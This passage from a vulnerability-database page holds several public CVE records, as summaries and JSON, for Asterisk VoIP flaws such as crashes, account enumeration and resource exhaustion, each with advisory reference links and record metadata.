              "name": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
            },
            {
              "name": "GLSA-200610-15",
              "refsource": "GENTOO",
              "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
            },
            {
              "name": "20835",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/20835"
            },
            {
              "name": "SUSE-SA:2006:069",
              "refsource": "SUSE",
              "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
            },
            {
              "name": "asterisk-channeldriver-dos(29664)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29664"
            },
            {
              "name": "22651",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22651"
            },
            {
              "name": "OpenPKG-SA-2006.024",
              "refsource": "OPENPKG",
              "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
            },
            {
              "name": "http://www.asterisk.org/node/110",
              "refsource": "CONFIRM",
              "url": "http://www.asterisk.org/node/110"
            },
            {
              "name": "22979",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22979"
            },
            {
              "name": "http://www.asterisk.org/node/109",
              "refsource": "CONFIRM",
              "url": "http://www.asterisk.org/node/109"
            },
            {
              "name": "29973",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/29973"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-5445",
    "datePublished": "2006-10-23T17:00:00",
    "dateReserved": "2006-10-23T00:00:00",
    "dateUpdated": "2024-08-07T19:48:30.533Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-46837

Vulnerability from cvelistv5

Published

2022-08-30 00:00

Modified

2024-08-04 05:17

Severity ?

Summary

res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/AST-2021-006.html
	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	mailing-list
	https://www.debian.org/security/2022/dsa-5285	vendor-advisory

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:17:42.455Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
          },
          {
            "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
          },
          {
            "name": "DSA-5285",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5285"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-18T00:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
        },
        {
          "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
        },
        {
          "name": "DSA-5285",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5285"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-46837",
    "datePublished": "2022-08-30T00:00:00",
    "dateReserved": "2022-08-30T00:00:00",
    "dateUpdated": "2024-08-04T05:17:42.455Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2536

Vulnerability from cvelistv5

Published

2011-07-06 19:00

Modified

2024-08-06 23:08

Severity ?

Summary

chan_sip.c in the SIP channel driver in Asterisk Open Source 1.4.x before 1.4.41.2, 1.6.2.x before 1.6.2.18.2, and 1.8.x before 1.8.4.4, and Asterisk Business Edition C.3.x before C.3.7.3, disregards the alwaysauthreject option and generates different responses for invalid SIP requests depending on whether the user account exists, which allows remote attackers to enumerate account names via a series of requests.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2011-011.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id?1025734	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T23:08:22.022Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
          },
          {
            "name": "1025734",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1025734"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.4.x before 1.4.41.2, 1.6.2.x before 1.6.2.18.2, and 1.8.x before 1.8.4.4, and Asterisk Business Edition C.3.x before C.3.7.3, disregards the alwaysauthreject option and generates different responses for invalid SIP requests depending on whether the user account exists, which allows remote attackers to enumerate account names via a series of requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2011-09-07T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
        },
        {
          "name": "1025734",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1025734"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2536",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.4.x before 1.4.41.2, 1.6.2.x before 1.6.2.18.2, and 1.8.x before 1.8.4.4, and Asterisk Business Edition C.3.x before C.3.7.3, disregards the alwaysauthreject option and generates different responses for invalid SIP requests depending on whether the user account exists, which allows remote attackers to enumerate account names via a series of requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-011.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
            },
            {
              "name": "1025734",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1025734"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2536",
    "datePublished": "2011-07-06T19:00:00",
    "dateReserved": "2011-06-27T00:00:00",
    "dateUpdated": "2024-08-06T23:08:22.022Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-26498

Vulnerability from cvelistv5

Published

2022-04-15 00:00

Modified

2024-08-03 05:03

Severity ?

Summary

An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/
	https://downloads.asterisk.org/pub/security/AST-2022-001.html
	http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html
	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	mailing-list
	https://www.debian.org/security/2022/dsa-5285	vendor-advisory
	http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:03:32.984Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
          },
          {
            "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
          },
          {
            "name": "DSA-5285",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5285"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-04T00:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
        },
        {
          "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
        },
        {
          "name": "DSA-5285",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5285"
        },
        {
          "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-26498",
    "datePublished": "2022-04-15T00:00:00",
    "dateReserved": "2022-03-06T00:00:00",
    "dateUpdated": "2024-08-03T05:03:32.984Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-1174

Vulnerability from cvelistv5

Published

2011-03-31 22:00

Modified

2024-08-06 22:21

Severity ?

Summary

manager.c in Asterisk Open Source 1.6.1.x before 1.6.1.24, 1.6.2.x before 1.6.2.17.2, and 1.8.x before 1.8.3.2 allows remote attackers to cause a denial of service (CPU and memory consumption) via a series of manager sessions involving invalid data.

References

▼	URL	Tags
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html	vendor-advisory, x_refsource_FEDORA
	http://www.debian.org/security/2011/dsa-2225	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html	vendor-advisory, x_refsource_FEDORA
	https://bugzilla.redhat.com/show_bug.cgi?id=688675	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2011-003.html	x_refsource_CONFIRM
	http://openwall.com/lists/oss-security/2011/03/17/5	mailing-list, x_refsource_MLIST
	http://www.securityfocus.com/bid/46897	vdb-entry, x_refsource_BID
	https://exchange.xforce.ibmcloud.com/vulnerabilities/66139	vdb-entry, x_refsource_XF
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html	vendor-advisory, x_refsource_FEDORA
	http://www.vupen.com/english/advisories/2011/0686	vdb-entry, x_refsource_VUPEN
	http://www.vupen.com/english/advisories/2011/0790	vdb-entry, x_refsource_VUPEN
	http://securitytracker.com/id?1025223	vdb-entry, x_refsource_SECTRACK
	http://openwall.com/lists/oss-security/2011/03/21/12	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:21:33.497Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "FEDORA-2011-3945",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
          },
          {
            "name": "DSA-2225",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2225"
          },
          {
            "name": "FEDORA-2011-3942",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688675"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-003.html"
          },
          {
            "name": "[oss-security] 20110317 CVE request for Asterisk flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
          },
          {
            "name": "46897",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/46897"
          },
          {
            "name": "asterisk-writes-dos(66139)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66139"
          },
          {
            "name": "FEDORA-2011-3958",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
          },
          {
            "name": "ADV-2011-0686",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0686"
          },
          {
            "name": "ADV-2011-0790",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0790"
          },
          {
            "name": "1025223",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025223"
          },
          {
            "name": "[oss-security] 20110321 Re: CVE request for Asterisk flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-03-16T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "manager.c in Asterisk Open Source 1.6.1.x before 1.6.1.24, 1.6.2.x before 1.6.2.17.2, and 1.8.x before 1.8.3.2 allows remote attackers to cause a denial of service (CPU and memory consumption) via a series of manager sessions involving invalid data."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-16T14:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "FEDORA-2011-3945",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
        },
        {
          "name": "DSA-2225",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2225"
        },
        {
          "name": "FEDORA-2011-3942",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688675"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-003.html"
        },
        {
          "name": "[oss-security] 20110317 CVE request for Asterisk flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
        },
        {
          "name": "46897",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/46897"
        },
        {
          "name": "asterisk-writes-dos(66139)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66139"
        },
        {
          "name": "FEDORA-2011-3958",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
        },
        {
          "name": "ADV-2011-0686",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0686"
        },
        {
          "name": "ADV-2011-0790",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0790"
        },
        {
          "name": "1025223",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025223"
        },
        {
          "name": "[oss-security] 20110321 Re: CVE request for Asterisk flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-1174",
    "datePublished": "2011-03-31T22:00:00",
    "dateReserved": "2011-03-03T00:00:00",
    "dateUpdated": "2024-08-06T22:21:33.497Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26713

Vulnerability from cvelistv5

Published

2021-02-19 19:30

Modified

2024-08-03 20:33

Severity ?

Summary

A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/	x_refsource_MISC
	https://downloads.asterisk.org/pub/security/AST-2021-004.html	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-29205	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:40.660Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-19T19:30:30",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-26713",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://downloads.asterisk.org/pub/security/",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-26713",
    "datePublished": "2021-02-19T19:30:30",
    "dateReserved": "2021-02-05T00:00:00",
    "dateUpdated": "2024-08-03T20:33:40.660Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-2232

Vulnerability from cvelistv5

Published

2016-02-22 15:05

Modified

2024-08-05 23:24

Severity ?

Summary

Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3 allow remote authenticated users to cause a denial of service (uninitialized pointer dereference and crash) via a zero length error correcting redundancy packet for a UDPTL FAX packet that is lost.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2016-003.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1034931	vdb-entry, x_refsource_SECTRACK
	http://www.debian.org/security/2016/dsa-3700	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:24:48.950Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-003.html"
          },
          {
            "name": "1034931",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1034931"
          },
          {
            "name": "DSA-3700",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3700"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-02-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3 allow remote authenticated users to cause a denial of service (uninitialized pointer dereference and crash) via a zero length error correcting redundancy packet for a UDPTL FAX packet that is lost."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-11-03T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-003.html"
        },
        {
          "name": "1034931",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1034931"
        },
        {
          "name": "DSA-3700",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3700"
        }
      ],
      "x_legacyV4Record": {
